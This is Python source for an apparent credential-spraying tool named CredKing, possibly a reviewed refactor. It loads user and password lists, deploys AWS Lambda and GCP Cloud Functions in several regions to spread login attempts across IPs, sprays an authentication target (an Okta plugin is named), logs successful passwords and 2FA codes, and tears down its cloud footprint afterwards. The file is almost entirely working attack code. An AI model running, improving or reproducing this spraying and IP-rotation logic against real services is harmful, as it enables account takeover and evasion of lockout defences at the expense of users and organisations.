def create_zip(plugin):
    """Package a plugin's directory into a uniquely-named zip under build/.

    Returns the path of the created archive (e.g. 'build/okta_ab12cd.zip').
    """
    source_dir = f'plugins/{plugin}/'
    suffix = next(generate_random())
    archive_path = f'build/{plugin}_{suffix}.zip'
    with lock:
        log_entry(f'Creating build deployment for plugin: {plugin}')
        # make_archive appends '.zip' itself, so hand it the path minus extension.
        shutil.make_archive(archive_path[:-4], 'zip', source_dir)
    return archive_path
def check_function(function, function_name):
    """Poll the Cloud Functions API until the named function reports ACTIVE."""
    poll_seconds = 5
    while True:
        state = function.get(name=function_name).execute()
        if state['status'] == 'ACTIVE':
            break
        log_entry(f"Waiting {poll_seconds} seconds for function to become ACTIVE")
        time.sleep(poll_seconds)
    log_entry(f"Created Function: {function_name}")
def invoke_function(function, function_name, payload):
    """Call a deployed Cloud Function synchronously and log the spray outcome.

    The function's JSON 'result' is expected to carry username/password/code/
    success fields — TODO confirm against the plugin's lambda_handler.
    """
    response = function.call(name=function_name, body=payload).execute()
    result = json.loads(response['result'])
    user = result['username']
    password = result['password']
    code_2fa = result['code']
    if result['success']:
        # clear_credentials(user, password)
        log_entry('(SUCCESS) {} / {} -> Success! (2FA: {})'.format(
            user, password, code_2fa))
    else:
        log_entry('(FAILED) {} / {} -> Failed.'.format(user, password))
def clean_up(access_key, secret_access_key, only_lambdas=True):
    """Tear down CredKing AWS resources and local build artifacts.

    Deletes every non-$LATEST lambda in each initialized client region,
    optionally removes the CredKing IAM role, and clears build/*.zip files.

    FIX: the original referenced an undefined name `region` inside both
    except handlers, which raised NameError instead of logging the failure;
    the region is now captured from the client once per iteration. Bare
    `except:` clauses were narrowed to `except Exception` so KeyboardInterrupt
    and SystemExit are no longer swallowed.
    """
    if not only_lambdas:
        client = init_client('iam', access_key, secret_access_key)
        client.delete_role(RoleName='CredKing_Role')
    for client_name, client in lambda_clients.items():
        region = client.meta.region_name
        log_entry('Cleaning up lambdas in {}...'.format(region))
        try:
            lambdas_functions = client.list_functions(FunctionVersion='ALL',
                                                      MaxItems=1000)
            if lambdas_functions:
                for lambda_function in lambdas_functions['Functions']:
                    # Skip $LATEST ARNs; only published versions are destroyed.
                    if '$LATEST' not in lambda_function['FunctionArn']:
                        lambda_name = lambda_function['FunctionName']
                        arn = lambda_function['FunctionArn']
                        try:
                            log_entry('Destroying {} in region: {}'.format(
                                arn, region))
                            client.delete_function(FunctionName=lambda_name)
                        except Exception:
                            log_entry(
                                'Failed to clean-up {} using client region {}'.
                                format(arn, region))
        except Exception:
            log_entry('Failed to connect to client region {}'.format(region))
    # Best-effort removal of local build artifacts.
    filelist = [f for f in os.listdir('build') if f.endswith(".zip")]
    for f in filelist:
        os.remove(os.path.join('build', f))
def create_function(sa_credentials, project_id, source_url, location):
    """Deploy one CredKing Cloud Function in `location` and return its name.

    The returned name is the full resource path
    projects/<id>/locations/<loc>/functions/<name>.
    """
    service = build('cloudfunctions', 'v1', credentials=sa_credentials)
    log_entry(location)
    f_name = f'credking-function-{next(generate_random())}'
    location_name = f"projects/{project_id}/locations/{location}"
    function_name = f"{location_name}/functions/{f_name}"
    log_entry(function_name)
    log_entry(f"Creating Function: {function_name}")
    # Function spec: small footprint, single instance, open ingress.
    body = {
        "name": function_name,
        "availableMemoryMb": 128,
        "entryPoint": "lambda_handler",
        "description": "CredKing Function",
        "timeout": "60s",
        "runtime": "python37",
        "ingressSettings": "ALLOW_ALL",
        "maxInstances": 1,
        "sourceArchiveUrl": source_url,
        "httpsTrigger": {},
        "vpcConnector": "",
        "serviceAccountEmail": _service_account_email
    }
    functions_api = service.projects().locations().functions()
    create_resp = functions_api.create(location=location_name,
                                       body=body).execute()
    log_entry(f"Function Resp: {create_resp}")
    return function_name
def create_lambda(access_key, secret_access_key, zip_path, region_idx):
    """Create one AWS lambda from a build zip; return its ARN, or None on error."""
    region = regions[region_idx]
    _, zip_name = ntpath.split(zip_path)
    build_file = zip_name.split('.')[0]
    # TODO: Figure out how to do dynamic source in GCP to revert this back
    # to '{plugin}.lambda_handler' derived from the build file name.
    handler_name = '{}.lambda_handler'.format('main')
    with open(zip_path, 'rb') as fh:
        zip_data = fh.read()
    try:
        role_name = create_role(access_key, secret_access_key, region)
        client = init_client('lambda', access_key, secret_access_key, region)
        response = client.create_function(
            Code={
                'ZipFile': zip_data,
            },
            Description='',
            FunctionName=build_file,
            Handler=handler_name,
            MemorySize=128,
            Publish=True,
            Role=role_name,
            Runtime='python3.7',
            Timeout=8,
            VpcConfig={},
        )
        log_entry('Created lambda {} in {}'.format(response['FunctionArn'],
                                                   region))
        return response['FunctionArn']
    except Exception as ex:
        log_entry('Error creating lambda using {} in {}: {}'.format(
            zip_path, region, ex))
        return None
def create_functions(sa_credentials, locations, project_id, source_url,
                     thread_count):
    """Deploy up to `thread_count` Cloud Functions across fixed regions.

    Returns the list of created function resource names.
    """
    # The list call is kept for its API side effect even though the response
    # is no longer used for region selection — NOTE(review): confirm needed.
    locations_response = locations.list(
        name=f'projects/{project_id}').execute()
    # Hard-coded region set instead of the dynamic locations_response.
    location_names = [
        "us-central1", "us-east1", "us-east4", "europe-west1", "asia-east2"
    ]
    log_entry(len(location_names))
    # One function per thread, capped by the number of available regions.
    threads = min(thread_count, len(location_names))
    log_entry(f"Number of functions to be created: {threads}")
    function = locations.functions()
    futures = []
    with ThreadPoolExecutor(max_workers=threads) as executor:
        for idx in range(threads):
            futures.append(
                executor.submit(create_function,
                                sa_credentials=sa_credentials,
                                project_id=project_id,
                                source_url=source_url,
                                location=location_names[idx]))
    for fut in futures:
        log_entry(fut.result())
    return [fut.result() for fut in futures]
def invoke_lambda(access_key, secret_access_key, arn, payload):
    """Invoke one lambda synchronously and log the credential-spray outcome.

    The region and function name are parsed from the ARN
    (arn:aws:lambda:<region>:<acct>:function:<name>).
    NOTE: mutates the caller's `payload` dict by inserting 'region'.

    FIX: removed the unused `lambdas = []` local and replaced the
    non-idiomatic `== True` comparison with a truthiness check.
    """
    arn_parts = arn.split(':')
    region, func = arn_parts[3], arn_parts[-1]
    client = init_client('lambda', access_key, secret_access_key, region)
    payload['region'] = region
    response = client.invoke(FunctionName=func,
                             InvocationType="RequestResponse",
                             Payload=bytearray(json.dumps(payload), 'utf-8'))
    return_payload = json.loads(response['Payload'].read().decode("utf-8"))
    user, password = return_payload['username'], return_payload['password']
    code_2fa = return_payload['code']
    if return_payload['success']:
        # clear_credentials(user, password)
        log_entry('(SUCCESS) {} / {} -> Success! (2FA: {})'.format(
            user, password, code_2fa))
    else:
        log_entry('(FAILED) {} / {} -> Failed.'.format(user, password))
def load_credentials(user_file, password_file, useragent_file=None):
    """Build the user x password cartesian product and enqueue every combo.

    Each combo is appended to the module-level credentials['accounts'] list
    and pushed onto the shared queue `q`, with a random user-agent attached.
    """
    log_entry('Loading credentials from {} and {}'.format(
        user_file, password_file))
    users = load_file(user_file)
    passwords = load_file(password_file)
    if useragent_file is None:
        useragents = [
            "Python CredKing (https://github.com/ustayready/CredKing)"
        ]
    else:
        useragents = load_file(useragent_file)
    for user in users:
        for password in passwords:
            credentials['accounts'].append({
                'username': user,
                'password': password,
                'useragent': random.choice(useragents),
            })
    for cred in credentials['accounts']:
        q.put(cred)
def display_stats(start=True):
    """Log run statistics: combo count at start, timing at the end.

    Relies on the module globals end_time and time_lapse being set by main().
    """
    if start:
        log_entry('User/Password Combinations: {}'.format(
            len(credentials['accounts'])))
    if end_time and not start:
        log_entry('End Time: {}'.format(end_time))
        log_entry('Total Execution: {} seconds'.format(time_lapse))
def delete_zip():
    """Remove every zip archive from the local build directory."""
    for zip_name in [n for n in os.listdir('build') if n.endswith(".zip")]:
        os.remove(os.path.join('build', zip_name))
        log_entry(f"Removing file {zip_name}")
def delete_function(function, function_name):
    """Delete a deployed Cloud Function and log the API response."""
    delete_resp = function.delete(name=function_name).execute()
    log_entry(delete_resp)
def main(args, pargs):
    """Orchestrate a full spray run: validate args, deploy, spray, clean up.

    args   - parsed argparse namespace (threads, plugin, files, env, creds).
    pargs  - leftover plugin-specific '--key value' argument pairs.

    FIX: the thread-cap branch called len() on an int
    (`threads = len(total_functions_available)`), raising TypeError whenever
    thread_count exceeded the available function slots; it now assigns the
    int directly.
    """
    global start_time, end_time, time_lapse

    # Required Fields
    thread_count = args.threads
    plugin = args.plugin
    username_file = args.userfile
    password_file = args.passwordfile
    environments = args.env

    gcp_enabled = False
    aws_enabled = False
    sa_file = None
    access_key = None
    secret_access_key = None

    # Validate per-environment required credentials; exit on any gap.
    for env in environments:
        if env == "gcp":
            sa_file = args.sa_creds_file
            if sa_file is not None:
                print("Contains all the necessary GCP Fields")
            else:
                print("Field requirements are not met")
                sys.exit(0)
            gcp_enabled = True
        elif env == "aws":
            access_key = args.access_key
            secret_access_key = args.secret_access_key
            if access_key is not None and secret_access_key is not None:
                print("Contains all the necessary AWS Fields")
            else:
                print("Field requirements are not met")
                sys.exit(0)
            aws_enabled = True
        else:
            print("Field requirements are not met")
            sys.exit(0)

    # Optional Fields
    user_agent_file = args.useragentfile

    # Fold '--key value' leftovers into a dict. NOTE(review): this walks in
    # steps of 1, so values are also picked up as keys — preserved as-is since
    # plugins only read the keys they expect; confirm before changing.
    pluginargs = {}
    for i in range(0, len(pargs) - 1):
        key = pargs[i].replace("--", "")
        pluginargs[key] = pargs[i + 1]

    start_time = datetime.datetime.utcnow()
    log_entry(f"Execution started at: {start_time}")

    # Prepare credential combinations into the queue
    load_credentials(username_file, password_file, user_agent_file)

    threads = thread_count
    # TODO: Need to figure out how to do this dynamically
    # (location_names / regions are presumably module globals — confirm).
    total_functions_available = len(location_names) + len(regions)
    if thread_count > total_functions_available:
        # FIX: was `len(total_functions_available)` on an int -> TypeError.
        threads = total_functions_available
    elif thread_count > len(credentials['accounts']):
        threads = len(credentials['accounts'])

    total_threads = 0
    if len(credentials['accounts']) == 1 and len(environments) > 1:
        total_threads = 1
        log_entry("Too many environments for only 1 credential")
        sys.exit(0)
    else:
        print(math.floor(thread_count / len(environments)))
        total_threads = threads
    # Split the thread budget evenly across the enabled environments.
    threads = math.floor(total_threads / len(environments))
    log_entry(f"Number of threads per environment: {threads}")

    functions = []
    service = None
    bucket = None
    sa_credentials = None
    if gcp_enabled:
        sa_credentials = credkingGCP.service_account.Credentials.from_service_account_file(
            sa_file)
        # TODO: Evaluate if this variable is needed
        global _service_account_email
        _service_account_email = sa_credentials.service_account_email
        service = credkingGCP.build('cloudfunctions', 'v1',
                                    credentials=sa_credentials)
        storage_service = credkingGCP.build('storage', 'v1',
                                            credentials=sa_credentials)
        # Creating a bucket
        bucket_name = f"credking_{next(generate_random())}"
        body = {'name': bucket_name}
        log_entry(storage_service.buckets().insert(
            project=sa_credentials.project_id,
            predefinedAcl="projectPrivate",
            body=body).execute())
        # Uploading a file from a created bucket
        storage_client = credkingGCP.storage.Client(
            project=sa_credentials.project_id, credentials=sa_credentials)
        bucket = storage_client.bucket(bucket_name)
        source_url = credkingGCP.create_bucket(bucket, 'okta')
        locations = service.projects().locations()
        functions = credkingGCP.create_functions(sa_credentials, locations,
                                                 sa_credentials.project_id,
                                                 source_url, threads)
        # Block until every function reports ACTIVE before spraying.
        for function_name in functions:
            credkingGCP.check_function(locations.functions(), function_name)

    arns = []
    if aws_enabled:
        # Prepare the deployment package
        zip_path = credkingAWS.create_zip(plugin)
        # Create lambdas based on thread count
        arns = credkingAWS.load_lambdas(access_key, secret_access_key,
                                        threads, zip_path)

    display_stats()

    # Start Spray across both AWS lambdas and GCP functions.
    serverless_list = arns + functions
    with ThreadPoolExecutor(max_workers=len(serverless_list)) as executor:
        for serverless in serverless_list:
            log_entry(f'Launching spray {serverless}...')
            executor.submit(start_spray,
                            access_key=access_key,
                            secret_access_key=secret_access_key,
                            args=pluginargs,
                            sa_credentials=sa_credentials,
                            serverless=serverless)

    # Capture duration
    end_time = datetime.datetime.utcnow()
    time_lapse = (end_time - start_time).total_seconds()

    # Clean Up
    if gcp_enabled:
        for function_name in functions:
            credkingGCP.delete_function(
                service.projects().locations().functions(), function_name)
        credkingGCP.delete_bucket(bucket)
        credkingGCP.delete_zip()
    if aws_enabled:
        # Remove AWS resources and build zips
        credkingAWS.clean_up(access_key, secret_access_key, only_lambdas=True)

    display_stats(False)